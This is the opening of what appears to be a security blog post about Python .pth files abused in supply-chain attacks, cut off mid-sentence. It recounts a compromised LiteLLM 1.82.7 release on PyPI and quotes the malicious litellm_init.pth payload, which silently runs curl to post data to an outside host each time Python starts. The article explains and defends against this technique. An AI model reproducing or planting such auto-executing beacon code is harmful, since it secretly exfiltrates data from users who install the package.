How .pth Files Became a Supply Chain Weapon (and How to Detect Them)

The Attack That Started It On March 24, 2026, LiteLLM 1.82.7 was published to PyPI. It contained a file called litellm_init.pth: import subprocess, sys subprocess.Popen( ['curl', '-s', 'https://models.litellm.cloud/beacon', '-d', sys.version], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL ) This wasn't in the main code. It was in a .pth file. What Are .pth Files? Python's .pth (path) files live in site-packages/ and execute every time you start Pyth